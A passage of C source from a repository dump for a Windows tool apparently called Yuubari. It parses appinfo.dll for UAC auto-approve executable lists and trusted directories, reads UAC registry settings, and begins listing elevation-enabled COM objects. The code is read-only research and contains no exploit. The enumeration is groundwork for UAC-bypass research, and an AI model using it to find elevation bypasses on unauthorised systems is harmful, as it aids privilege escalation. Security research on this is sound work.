pSymSetOptions = (pfnSymSetOptions)GetProcAddress(dllHandle, \"SymSetOptions\");\n    if (pSymSetOptions == NULL)\n        return FALSE;\n\n    pSymLoadModuleEx = (pfnSymLoadModuleExW)GetProcAddress(dllHandle, \"SymLoadModuleExW\");\n    if (pSymLoadModuleEx == NULL)\n        return FALSE;\n\n    pSymFromName = (pfnSymFromNameW)GetProcAddress(dllHandle, \"SymFromNameW\");\n    if (pSymFromName == NULL)\n        return FALSE;\n\n    pSymUnloadModule64 = (pfnSymUnloadModule64)GetProcAddress(dllHandle, \"SymUnloadModule64\");\n    if (pSymUnloadModule64 == NULL)\n        return FALSE;\n\n    pSymCleanup = (pfnSymCleanup)GetProcAddress(dllHandle, \"SymCleanup\");\n    if (pSymCleanup == NULL)\n        return FALSE;\n\n    pSymSetOptions(SYMOPT_DEFERRED_LOADS | SYMOPT_UNDNAME);\n\n    szBuffer[dirLength] = 0;\n    _strcat(szBuffer, TEXT(\"Symbols\"));\n    if (!CreateDirectory((LPCWSTR)&szBuffer, NULL))\n        if (GetLastError() != ERROR_ALREADY_EXISTS)\n            return FALSE;\n\n    _strcpy(szUserSearchPath, TEXT(\"SRV*\"));\n    _strcat(szUserSearchPath, szBuffer);\n    _strcat(szUserSearchPath, DEFAULT_SYMPATH);\n\n    processHandle = GetCurrentProcess();\n\n    if (pSymInitialize(processHandle, szUserSearchPath, FALSE)) {\n\n        baseOfDll = pSymLoadModuleEx(processHandle,\n            NULL,\n            TEXT(\"appinfo.dll\"),\n            NULL,\n            (DWORD64)AppInfo->DllBase,\n            0,\n            NULL,\n            0);\n\n        if (baseOfDll) {\n            AppInfo->lpAutoApproveEXEList = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpAutoApproveEXEList\"), NULL);\n            AppInfo->lpIncludedPFDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpIncludedPFDirs\"), NULL);\n            AppInfo->lpIncludedWindowsDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpIncludedWindowsDirs\"), NULL);\n            AppInfo->lpIncludedSystemDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, 
TEXT(\"g_lpIncludedSystemDirs\"), NULL);\n            AppInfo->lpExemptedAutoApproveExes = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpExemptedAutoApproveExes\"), NULL);\n            AppInfo->lpExcludedWindowsDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpExcludedWindowsDirs\"), NULL);\n\n            pSymUnloadModule64(processHandle, baseOfDll);\n            pSymCleanup(processHandle);\n\n            return TRUE;\n        }\n\n        // Symbol handler was initialized but the module failed to load, release it.\n        pSymCleanup(processHandle);\n    }\n\n    return FALSE;\n}\n\n/*\n* AipFindMSBlockInSection\n*\n* Purpose:\n*\n* Scan a section for a pointer-sized value equal to PatternValue.\n*\n*/\nPVOID AipFindMSBlockInSection(\n    _In_ PVOID DllBase,\n    _In_ IMAGE_SECTION_HEADER* SectionTableEntry,\n    _In_ ULONG_PTR PatternValue\n)\n{\n    PBYTE SectionBase;\n    ULONG SectionSize, Offset;\n\n    ULONG_PTR TestValue;\n    PVOID RefPointer = NULL, pvMmcBlock = NULL;\n\n    SectionBase = (PBYTE)RtlOffsetToPointer(DllBase, SectionTableEntry->VirtualAddress);\n    SectionSize = SectionTableEntry->Misc.VirtualSize;\n\n    // A section smaller than a pointer cannot hold the pattern, and the\n    // unsigned loop bound below would wrap around for it.\n    if (SectionSize < sizeof(ULONG_PTR))\n        return NULL;\n\n    for (Offset = 0; Offset < SectionSize - sizeof(ULONG_PTR); Offset++) {\n\n        RefPointer = SectionBase + Offset;\n        TestValue = *(PULONG_PTR)RefPointer;\n        if (TestValue == PatternValue) {\n            pvMmcBlock = (PVOID)RefPointer;\n            break;\n        }\n    }\n\n    return pvMmcBlock;\n}\n\n/*\n* AipQueryMSBlock\n*\n* Purpose:\n*\n* Locate mmc block.\n*\n*/\nBOOLEAN AipQueryMSBlock(\n    _In_ UAC_AI_GLOBALS* AppInfo\n)\n{\n    ULONG i;\n    ULONG SectionSize;\n    ULONG_PTR PatternValue = 0;\n    PVOID pvMmcBlock = NULL;\n    PBYTE SectionBase;\n    IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(AppInfo->DllBase);\n    IMAGE_SECTION_HEADER* SectionTableEntry, * RDataTableEntry = NULL;\n\n    WCHAR szSignature[] = L\"mmc.exe\";\n\n    SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders);\n\n    for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) {\n\n        SectionBase = 
(PBYTE)RtlOffsetToPointer(AppInfo->DllBase, SectionTableEntry->VirtualAddress);\n        SectionSize = SectionTableEntry->Misc.VirtualSize;\n\n        PatternValue = (ULONG_PTR)supFindPattern(SectionBase,\n            SectionSize,\n            (CONST PBYTE)szSignature,\n            sizeof(szSignature));\n\n        if (PatternValue)\n            break;\n    }\n\n    if (PatternValue == 0)\n        return FALSE;\n\n    SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders);\n    for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) {\n        if (_strncmp_a(\n            (CHAR*)SectionTableEntry->Name,\n            RDATA_SECTION,\n            RDATA_SECTION_LENGTH) == 0)\n        {\n            RDataTableEntry = SectionTableEntry;\n            break;\n        }\n    }\n\n    if (RDataTableEntry) {\n\n        pvMmcBlock = AipFindMSBlockInSection(AppInfo->DllBase,\n            RDataTableEntry,\n            PatternValue);\n\n    }\n    else {\n\n        SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders);\n        for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) {\n\n            pvMmcBlock = AipFindMSBlockInSection(AppInfo->DllBase,\n                SectionTableEntry,\n                PatternValue);\n\n            if (pvMmcBlock)\n                break;\n        }\n    }\n\n    if (pvMmcBlock) {\n        AppInfo->MmcBlock = pvMmcBlock;\n        return TRUE;\n    }\n\n    return FALSE;\n}\n\nBOOL IsCrossPtr(\n    _In_ UAC_AI_GLOBALS* AppInfo,\n    _In_ ULONG_PTR Ptr,\n    _In_ ULONG_PTR CurrentList\n)\n{\n    if (Ptr == 0 || AppInfo == NULL) {\n        return TRUE;\n    }\n\n    if (!IN_REGION(Ptr, AppInfo->DllBase, AppInfo->DllVirtualSize)) {\n        return TRUE;\n    }\n\n    if (AppInfo->lpAutoApproveEXEList) {\n        if (CurrentList != (ULONG_PTR)AppInfo->lpAutoApproveEXEList)\n            if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpAutoApproveEXEList[0])\n                return TRUE;\n    }\n    if 
(AppInfo->lpExcludedWindowsDirs) {\n        if (CurrentList != (ULONG_PTR)AppInfo->lpExcludedWindowsDirs)\n            if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpExcludedWindowsDirs[0])\n                return TRUE;\n    }\n    if (AppInfo->lpExemptedAutoApproveExes) {\n        if (CurrentList != (ULONG_PTR)AppInfo->lpExemptedAutoApproveExes)\n            if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpExemptedAutoApproveExes[0])\n                return TRUE;\n    }\n    if (AppInfo->lpIncludedPFDirs) {\n        if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedPFDirs)\n            if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedPFDirs[0])\n                return TRUE;\n    }\n    if (AppInfo->lpIncludedSystemDirs) {\n        if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedSystemDirs)\n            if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedSystemDirs[0])\n                return TRUE;\n    }\n    if (AppInfo->lpIncludedWindowsDirs) {\n        if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedWindowsDirs)\n            if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedWindowsDirs[0])\n                return TRUE;\n    }\n    return FALSE;\n}\n\n/*\n* ListMMCFiles\n*\n* Purpose:\n*\n* Output MMC related block from appinfo.dll.\n*\n*/\nVOID ListMMCFiles(\n    _In_ UAC_AI_GLOBALS* AppInfo,\n    _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n    SIZE_T          i, Length;\n    LPWSTR          TestString = NULL;\n    PVOID* MscArray = NULL;\n    UAC_AI_DATA     CallbackData;\n\n    if (!AipQueryMSBlock(AppInfo))\n        return;\n\n    __try {\n        if (AppInfo->MmcBlock->NumOfElements == 0 ||\n            AppInfo->MmcBlock->NumOfElements > 256) {\n            OutputDebugString(TEXT(\"Invalid block data\"));\n        }\n        else {\n            CallbackData.Type = AiManagementConsole;\n            TestString = AppInfo->MmcBlock->lpManagementApplication;\n            if (TestString) {\n                if (IN_REGION(TestString, AppInfo->DllBase, 
AppInfo->DllVirtualSize)) {\n                    CallbackData.Name = TestString;\n                    CallbackData.Length = _strlen(TestString);\n                    OutputCallback((PVOID)&CallbackData);\n                }\n            }\n            CallbackData.Type = AiSnapinFile;\n            MscArray = (PVOID*)AppInfo->MmcBlock->Base;\n            for (i = 0; i < AppInfo->MmcBlock->NumOfElements; i++) {\n                TestString = (LPWSTR)MscArray[i];\n                if (TestString != NULL) {\n                    if (IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize)) {\n                        Length = _strlen(TestString);\n                        CallbackData.Name = TestString;\n                        CallbackData.Length = Length;\n                        OutputCallback((PVOID)&CallbackData);\n                    }\n                }\n            }\n        }\n    }\n    __except (EXCEPTION_EXECUTE_HANDLER) {\n        OutputDebugString(TEXT(\"Invalid block\"));\n        return;\n    }\n}\n\n/*\n* ListAutoApproveEXE\n*\n* Purpose:\n*\n* Output lpAutoApproveEXE list from appinfo.dll.\n*\n*/\nVOID ListAutoApproveEXE(\n    _In_ UAC_AI_GLOBALS* AppInfo,\n    _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n    BOOL bValidEntry;\n    WCHAR k, lk;\n    SIZE_T i, Length = 0;\n    LPWSTR TestString = NULL;\n    UAC_AI_DATA CallbackData;\n    SIZE_T MaxEntries = 100;\n\n    if (AppInfo->lpAutoApproveEXEList == NULL)\n        return;\n\n    CallbackData.Type = AiAutoApproveEXE;\n\n    i = 0;\n    k = 0;\n    lk = 0;\n    __try {\n        do {\n            if (i >= MaxEntries)\n                break;\n\n            TestString = (LPWSTR)AppInfo->lpAutoApproveEXEList[i];\n            if (IsCrossPtr(AppInfo, (ULONG_PTR)TestString, (ULONG_PTR)AppInfo->lpAutoApproveEXEList))\n                break;\n\n            if (!IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize))\n                break;\n\n            bValidEntry = FALSE;\n            __try {\n 
               k = TestString[0];\n                bValidEntry = TestChar(k);\n            }\n            __except (EXCEPTION_EXECUTE_HANDLER) {\n                break;\n            }\n\n            if (!bValidEntry)\n                break;\n\n            if (k < lk)\n                break;\n\n            lk = k;\n            i += 1;\n\n            __try {\n                Length = _strlen(TestString);\n                if (Length > MAX_PATH * 2) {\n                    continue;\n                }\n            }\n            __except (EXCEPTION_EXECUTE_HANDLER) {\n                continue;\n            }\n\n            Length = _strlen(TestString);\n            CallbackData.Length = Length;\n            CallbackData.Name = TestString;\n            OutputCallback((PVOID)&CallbackData);\n        } while (1);\n    }\n    __except (EXCEPTION_EXECUTE_HANDLER) {\n        OutputDebugString(TEXT(\"Invalid pointer, enum stop\"));\n        return;\n    }\n}\n\n/*\n* ListStringDataUnsorted\n*\n* Purpose:\n*\n* Output unsorted string data from appinfo.dll.\n*\n*/\nVOID ListStringDataUnsorted(\n    UAC_AI_GLOBALS* AppInfo,\n    AI_DATA_TYPE AiDataType,\n    PVOID* Data,\n    OUTPUTCALLBACK OutputCallback\n)\n{\n    BOOL bValidEntry = FALSE;\n    SIZE_T i, Length = 0, MaxEntries = 100;\n    LPWSTR TestString = NULL;\n    UAC_AI_DATA CallbackData;\n\n    if (Data == NULL)\n        return;\n\n    CallbackData.Type = AiDataType;\n\n    i = 0;\n\n    __try {\n        do {\n            if (i >= MaxEntries)\n                break;\n\n            TestString = (LPWSTR)Data[i];\n            if (IsCrossPtr(AppInfo, (ULONG_PTR)TestString, (ULONG_PTR)Data))\n                break;\n\n            if (!IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize))\n                break;\n\n            bValidEntry = FALSE;\n            __try {\n                bValidEntry = TestChar(TestString[0]);\n            }\n            __except (EXCEPTION_EXECUTE_HANDLER) {\n                break;\n  
          }\n\n            if (!bValidEntry)\n                break;\n\n            i += 1;\n\n            __try {\n                Length = _strlen(TestString);\n                if (Length > MAX_PATH * 2) {\n                    continue;\n                }\n            }\n            __except (EXCEPTION_EXECUTE_HANDLER) {\n                continue;\n            }\n\n            Length = _strlen(TestString);\n            CallbackData.Length = Length;\n            CallbackData.Name = TestString;\n            OutputCallback((PVOID)&CallbackData);\n        } while (1);\n    }\n    __except (EXCEPTION_EXECUTE_HANDLER) {\n        OutputDebugString(TEXT(\"Invalid pointer, enum stop\"));\n        return;\n    }\n}\n\n/*\n* ScanAppInfo\n*\n* Purpose:\n*\n* Map appinfo.dll and extract various information from it.\n*\n*/\nVOID ScanAppInfo(\n    LPWSTR lpFileName,\n    OUTPUTCALLBACK OutputCallback\n)\n{\n    NTSTATUS            status;\n    HANDLE              hFile = NULL, hSection = NULL;\n    PBYTE               DllBase = NULL;\n    SIZE_T              DllVirtualSize;\n    OBJECT_ATTRIBUTES   attr;\n    UNICODE_STRING      usFileName;\n    IO_STATUS_BLOCK     iosb;\n    UAC_AI_GLOBALS      AppInfo;\n\n    RtlSecureZeroMemory(&AppInfo, sizeof(AppInfo));\n    RtlInitEmptyUnicodeString(&usFileName, NULL, 0);\n\n    do {\n\n        //\n        // Due to brilliant MS design all newest versions has the same build in file version attributes.\n        //\n        if (g_NtBuildNumber >= NT_WIN10_19H1) {\n            AppInfo.AppInfoBuildNumber = g_NtBuildNumber;\n        }\n        else {\n            if (!GetAppInfoBuildVersion(lpFileName, &AppInfo.AppInfoBuildNumber))\n                break;\n        }\n\n        if (RtlDosPathNameToNtPathName_U(lpFileName, &usFileName, NULL, NULL) == FALSE)\n            break;\n\n        InitializeObjectAttributes(&attr, &usFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n        RtlSecureZeroMemory(&iosb, sizeof(iosb));\n\n        status = 
NtCreateFile(&hFile,\n            SYNCHRONIZE | FILE_READ_DATA,\n            &attr,\n            &iosb,\n            NULL,\n            0,\n            FILE_SHARE_READ,\n            FILE_OPEN,\n            FILE_SYNCHRONOUS_IO_NONALERT,\n            NULL,\n            0);\n\n        if (!NT_SUCCESS(status))\n            break;\n\n        status = NtCreateSection(&hSection,\n            SECTION_ALL_ACCESS,\n            NULL,\n            NULL,\n            PAGE_READONLY,\n            SEC_IMAGE,\n            hFile);\n\n        if (!NT_SUCCESS(status))\n            break;\n\n        DllBase = NULL;\n        DllVirtualSize = 0;\n\n        status = NtMapViewOfSection(hSection,\n            NtCurrentProcess(),\n            (PVOID*)&DllBase,\n            0,\n            0,\n            NULL,\n            &DllVirtualSize,\n            ViewUnmap,\n            0,\n            PAGE_READONLY);\n\n        if (!NT_SUCCESS(status))\n            break;\n\n        AppInfo.DllBase = DllBase;\n        AppInfo.DllVirtualSize = DllVirtualSize;\n\n        ListMMCFiles(&AppInfo, OutputCallback);\n\n        if (ResolveAppInfoSymbols(&AppInfo)) {\n            ListAutoApproveEXE(&AppInfo, OutputCallback);\n            ListStringDataUnsorted(&AppInfo, AiIncludedPFDirs, AppInfo.lpIncludedPFDirs, OutputCallback);\n            ListStringDataUnsorted(&AppInfo, AilpIncludedWindowsDirs, AppInfo.lpIncludedWindowsDirs, OutputCallback);\n            ListStringDataUnsorted(&AppInfo, AiIncludedSystemDirs, AppInfo.lpIncludedSystemDirs, OutputCallback);\n            ListStringDataUnsorted(&AppInfo, AiExemptedAutoApproveExes, AppInfo.lpExemptedAutoApproveExes, OutputCallback);\n            ListStringDataUnsorted(&AppInfo, AiExcludedWindowsDirs, AppInfo.lpExcludedWindowsDirs, OutputCallback);\n        }\n\n    } while (FALSE);\n\n    if (usFileName.Buffer != NULL)\n        RtlFreeUnicodeString(&usFileName);\n\n    if (DllBase != NULL)\n        NtUnmapViewOfSection(NtCurrentProcess(), DllBase);\n\n    if 
(hSection != NULL)\n        NtClose(hSection);\n\n    if (hFile != NULL)\n        NtClose(hFile);\n}\n"
  },
  {
    "path": "Source/Yuubari/appinfo.h",
    "content": "#/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2022\n*\n*  TITLE:       APPINFO.H\n*\n*  VERSION:     1.54\n*\n*  DATE:        01 Dec 2022\n*\n*  Header file for the AppInfo scan.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n#include <DbgHelp.h>\n\ntypedef enum _AI_DATA_TYPE {\n    AiSnapinFile = 1,\n    AiManagementConsole,\n    AiAutoApproveEXE,\n    AiIncludedPFDirs,\n    AiIncludedSystemDirs,\n    AilpIncludedWindowsDirs,\n    AiExemptedAutoApproveExes,\n    AiExcludedWindowsDirs,\n    AiMax\n} AI_DATA_TYPE;\n\ntypedef struct _UAC_AI_DATA {\n    LPWSTR Name;\n    SIZE_T Length;\n    AI_DATA_TYPE Type;\n} UAC_AI_DATA, *PUAC_AI_DATA;\n\ntypedef struct _UAC_MMC_BLOCK {\n    LPWSTR lpManagementApplication;\n    PVOID Base;\n    ULONG NumOfElements;\n    ULONG Reserved;\n} UAC_MMC_BLOCK, *PUAC_MMC_BLOCK;\n\ntypedef struct _UAC_AI_GLOBALS {\n    ULONG AppInfoBuildNumber;\n    PVOID DllBase;\n    SIZE_T DllVirtualSize;\n    UAC_MMC_BLOCK *MmcBlock;\n    PVOID *lpIncludedWindowsDirs;\n    PVOID *lpIncludedPFDirs;\n    PVOID *lpAutoApproveEXEList;\n    PVOID *lpIncludedSystemDirs;\n    PVOID *lpExemptedAutoApproveExes;\n    PVOID *lpExcludedWindowsDirs;\n} UAC_AI_GLOBALS, *PUAC_AI_GLOBALS;\n\ntypedef  DWORD(WINAPI *pfnSymSetOptions)(\n    _In_ DWORD   SymOptions);\n\ntypedef BOOL(WINAPI *pfnSymInitializeW)(\n    _In_ HANDLE hProcess,\n    _In_opt_ PCWSTR UserSearchPath,\n    _In_ BOOL fInvadeProcess);\n\ntypedef BOOL(WINAPI* pfnSymFromNameW)(\n    _In_ HANDLE hProcess,\n    _In_ PCWSTR Name,\n    _Inout_ PSYMBOL_INFOW Symbol);\n\ntypedef DWORD64(WINAPI *pfnSymLoadModuleExW)(\n    _In_ HANDLE 
hProcess,\n    _In_opt_ HANDLE hFile,\n    _In_opt_ PCWSTR ImageName,\n    _In_opt_ PCWSTR ModuleName,\n    _In_ DWORD64 BaseOfDll,\n    _In_ DWORD DllSize,\n    _In_opt_ PMODLOAD_DATA Data,\n    _In_ DWORD Flags);\n\ntypedef BOOL(WINAPI *pfnSymUnloadModule64)(\n    _In_ HANDLE hProcess,\n    _In_ DWORD64 BaseOfDll);\n\ntypedef BOOL(WINAPI *pfnSymCleanup)(\n    _In_ HANDLE hProcess);\n\nVOID ScanAppInfo(\n    LPWSTR lpFileName,\n    OUTPUTCALLBACK OutputCallback);\n"
  },
  {
    "path": "Source/Yuubari/basic.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n*  TITLE:       BASIC.C\n*\n*  VERSION:     1.60\n*\n*  DATE:        17 Jun 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nVOID QueryAndOutputRegValue(\n    _In_ OUTPUTCALLBACK OutputCallback,\n    _In_ HKEY hKey,\n    _In_ LPWSTR ValueName,\n    _In_ LPWSTR DisplayName,\n    _In_ BOOL IsBool\n)\n{\n    UAC_BASIC_DATA TempData;\n    ULONG Value = 0;\n    LRESULT Result = supRegReadDword(hKey, ValueName, &Value);\n    if (Result == ERROR_SUCCESS) {\n        RtlSecureZeroMemory(&TempData, sizeof(TempData));\n        TempData.Name = DisplayName;\n        TempData.IsValueBool = IsBool;\n        TempData.Value = Value;\n        OutputCallback((PVOID)&TempData);\n    }\n}\n\n/*\n* ScanBasicUacData\n*\n* Purpose:\n*\n* Query UserSharedData flags, UAC registry values.\n*\n*/\nVOID ScanBasicUacData(\n    _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n    ULONG Flags = 0;\n    LRESULT lRet;\n    HKEY hKey = NULL;\n\n    UAC_BASIC_DATA Data;\n\n    if (OutputCallback == NULL)\n        return;\n\n    if (!NT_SUCCESS(RtlQueryElevationFlags(&Flags)))\n        return;\n\n    RtlSecureZeroMemory(&Data, sizeof(Data));\n\n    Data.Name = T_FLAG_ELEVATION_ENABLED;\n    Data.IsValueBool = TRUE;\n    Data.Value = ((Flags & DBG_FLAG_ELEVATION_ENABLED) > 0);\n    OutputCallback((PVOID)&Data);\n\n    Data.Name = T_FLAG_VIRTUALIZATION_ENABLED;\n    Data.IsValueBool = TRUE;\n    Data.Value = ((Flags & DBG_FLAG_VIRTUALIZATION_ENABLED) > 0);\n    OutputCallback((PVOID)&Data);\n\n    Data.Name = T_FLAG_INSTALLERDETECT_ENABLED;\n    Data.IsValueBool = TRUE;\n    
Data.Value = ((Flags & DBG_FLAG_INSTALLER_DETECT_ENABLED) > 0);\n    OutputCallback((PVOID)&Data);\n\n    lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_SETTINGS_KEY, 0, KEY_READ, &hKey);\n    if (lRet == ERROR_SUCCESS && hKey != NULL) {\n        QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_PROMPT_BEHAVIOR, T_UAC_PROMPT_BEHAVIOR, FALSE);\n        QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_RESTRICTED_AUTOAPPROVE, T_UAC_RESTRICTED_AUTOAPPROVE, FALSE);\n        QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEIC, T_UAC_AUTOAPPROVEIC, FALSE);\n        QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEMP, T_UAC_AUTOAPPROVEMP, FALSE);\n        QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEHARDCLAIMS, T_UAC_AUTOAPPROVEHARDCLAIMS, FALSE);\n        QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_ENABLESECUREUIPATHS, T_UAC_ENABLESECUREUIPATHS, FALSE);\n        QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_SECURE_DESKTOP, T_UAC_SECURE_DESKTOP, TRUE);\n        RegCloseKey(hKey);\n    }\n}\n"
  },
  {
    "path": "Source/Yuubari/basic.h",
    "content": "#/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2020\n*\n*  TITLE:       BASIC.H\n*\n*  VERSION:     1.49\n*\n*  DATE:        11 Nov 2019\n*\n*  Header file for the basic UAC info scan.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef struct _UAC_BASIC_DATA {\n    LPWSTR Name;\n    DWORD Value;\n    BOOL IsValueBool;\n} UAC_BASIC_DATA, *PUAC_BASIC_DATA;\n\nVOID ScanBasicUacData(\n    _In_ OUTPUTCALLBACK OutputCallback);\n"
  },
  {
    "path": "Source/Yuubari/comobj.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n*  TITLE:       COMOBJ.C\n*\n*  VERSION:     1.60\n*\n*  DATE:        17 Jun 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include <Shlwapi.h>\n#include <shlobj.h>\n#include <Rpc.h>\n#pragma comment(lib, \"Shlwapi.lib\")\n#pragma comment(lib, \"Rpcrt4.lib\")\n\nVOID CopScanRegistry(\n    _In_ HKEY RootKey,\n    _In_ OUTPUTCALLBACK OutputCallback,\n    _In_ INTERFACE_INFO_LIST *InterfaceList);\n\n/*\n* CopRunOutputCallbackForInterface\n*\n* Purpose:\n*\n* Output interface information.\n*\n*/\nVOID CopRunOutputCallbackForInterface(\n    _In_ ULONG DataType,\n    _In_ INTERFACE_INFO *Interface,\n    _In_ CLSID clsid,\n    _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n    UAC_INTERFACE_DATA Data;\n\n    RtlSecureZeroMemory(&Data, sizeof(Data));\n    Data.DataType = DataType;\n    Data.Name = Interface->szInterfaceName;\n    Data.Clsid = clsid;\n    Data.IID = Interface->iid;\n    OutputCallback((PVOID)&Data);\n}\n\n/*\n* CopLocateInterfaceByCLSID\n*\n* Purpose:\n*\n* Search for interface by CLSID.\n*\n*/\nINTERFACE_INFO* CopLocateInterfaceByCLSID(\n    _In_ INTERFACE_INFO_LIST *InterfaceList,\n    _In_ CLSID clsid\n)\n{\n    IUnknown *Interface = NULL;\n    IUnknown *TestObject = NULL;\n\n    ULONG i;\n\n    INTERFACE_INFO* Result = NULL;\n\n    if (SUCCEEDED(CoCreateInstance(&clsid, NULL, CLSCTX_INPROC_SERVER,\n        &IID_IUnknown, (LPVOID)&Interface)))\n    {\n        for (i = 0; i < InterfaceList->cEntries; i++) {\n            Interface->lpVtbl->QueryInterface(Interface, &InterfaceList->List[i].iid, &TestObject);\n            if 
(TestObject != NULL) {\n                TestObject->lpVtbl->Release(TestObject);\n                Result = &InterfaceList->List[i];\n                break;\n            }\n        }\n        Interface->lpVtbl->Release(Interface);\n    }\n\n    return Result;\n}\n\n/*\n* CopQuerySubKey\n*\n* Purpose:\n*\n* Query subkey elevated COM object name.\n*\n*/\nVOID CopQuerySubKey(\n    _In_ HKEY RootKey,\n    _In_ LPWSTR lpKeyName,\n    _In_ BOOL ElevationKey,\n    _In_ OUTPUTCALLBACK OutputCallback,\n    _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n    LRESULT lRet;\n    HKEY    hSubKey = NULL, hAppIdKey = NULL, hServerObjectsKey = NULL;\n    DWORD   dwDataSize, dwEnabled = 0;\n    LPWSTR  lpName = NULL, lpAppId = NULL, lpAppIdName = NULL, lpLocalizedString = NULL, t = NULL, lpValue = NULL;\n\n    ULONG   i, cValues = 0, cMaxLength = 0, cchValue;\n\n    CLSID   clsid;\n\n    UAC_REGISTRY_DATA Data;\n    INTERFACE_INFO *LookupInterface;\n\n    BOOLEAN VirtualFactory = FALSE;\n\n    //open each sub key\n    lRet = RegOpenKeyEx(RootKey, lpKeyName, 0, KEY_READ, &hSubKey);\n    if ((lRet == ERROR_SUCCESS) && (hSubKey != NULL)) {\n        if (ElevationKey) {\n\n            do {\n\n                dwDataSize = sizeof(DWORD);\n                dwEnabled = 0;\n\n                //query elevation enabled\n                lRet = RegQueryValueEx(hSubKey, TEXT(\"Enabled\"), NULL,\n                    NULL,\n                    (LPBYTE)&dwEnabled,\n                    &dwDataSize\n                );\n\n                if (lRet != ERROR_SUCCESS)\n                    break;\n\n                if (dwEnabled != 1)\n                    break;\n\n                //\n                // Check virtual factory.\n                //\n                lRet = RegOpenKeyEx(RootKey, TEXT(\"VirtualServerObjects\"), 0, KEY_READ, &hServerObjectsKey);\n                VirtualFactory = ((lRet == ERROR_SUCCESS) && (hServerObjectsKey != NULL));\n\n                //query object name\n                lpName = 
supReadKeyString(RootKey, TEXT(\"\"), &dwDataSize);\n\n                //query localized string and convert it\n                dwDataSize = 0;\n                t = supReadKeyString(RootKey, TEXT(\"LocalizedString\"), &dwDataSize);\n                if (t) {\n                    lpLocalizedString = (LPWSTR)supHeapAlloc((SIZE_T)MAX_PATH * 2);\n                    if (lpLocalizedString) {\n                        SHLoadIndirectString(t, lpLocalizedString, MAX_PATH, NULL);\n                    }\n                    supHeapFree(t);\n                }\n\n                //check if AppId present\n                dwDataSize = 0;\n                t = supReadKeyString(RootKey, TEXT(\"AppId\"), &dwDataSize);\n                if (t) {\n                    lpAppId = (LPWSTR)supHeapAlloc((SIZE_T)dwDataSize + 32);\n                    if (lpAppId) {\n                        _strcpy(lpAppId, TEXT(\"AppId\\\\\"));\n                        _strcat(lpAppId, t);\n\n                        //open AppId key\n                        lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, lpAppId, 0,\n                            KEY_READ, &hAppIdKey);\n                        if (lRet == ERROR_SUCCESS) {\n                            //check if AccessPermission present\n                            lRet = RegQueryValueEx(hAppIdKey, TEXT(\"AccessPermission\"),\n                                